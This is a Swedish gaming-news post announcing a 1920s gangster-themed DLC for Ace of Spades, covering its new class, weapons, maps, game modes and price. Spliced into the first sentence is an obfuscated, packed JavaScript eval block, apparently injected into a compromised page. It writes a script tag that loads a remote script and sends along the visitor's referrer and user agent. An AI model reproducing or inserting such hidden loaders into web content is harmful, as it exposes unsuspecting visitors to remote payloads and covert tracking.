Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Ny DLC till spelet Ace of Spades

Ny DLC till spelet Ace of Spades
Sebastian

Ace eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skhkh|var|u0026u|referrer|seybn||js|php’.split(’|’),0,{}))
of Spades: Idag presenterade Jagex deras senaste DLC för det populära kreativa  action-spelet Ace of Spades. Temat är lagt på Alla hjärtans dag massakern, kartor och ikoniska platser så som fängelset Alcatraz i San Francisco och gangster gator i Chicago är några roliga teman.

Det har också tillkommit en ny klass ”Gangster” som är utrustad med en Tommy Gun, Snub Nosed Pistol, en Crowbar och Molotov Cocktail.

Det har också i denna DLC lanserats två nya spellägen för att återskapa en riktig 1920 gangster atmosfär. Den ena handlar om att ta över territorier och få kontroll över staden. Det andra är baserat på en VIP-spelare som ska skyddas från motståndarlaget och ta sig till en punkt. Samtidigt ska motståndarlaget försöka döda VIPen för att vinna rundan.

Denna DLC Alla hjärtans dag massakern lanseras idag på Steam och kommer att kosta  4,99 dollar / 3,99 euro och under första veckan är det 20 procent rabatt.

Ace of Spades DLC info:

·         6 new character skins

·         1 new character class

·         4 new weapons – Tommy Gun, Snub Nosed Pistol, Crowbar and Molotov Cocktail

·         2 new maps (Chicago and Alcatraz)

·         2 game modes(VIP and Territories)

 Läs mer: Hemsida!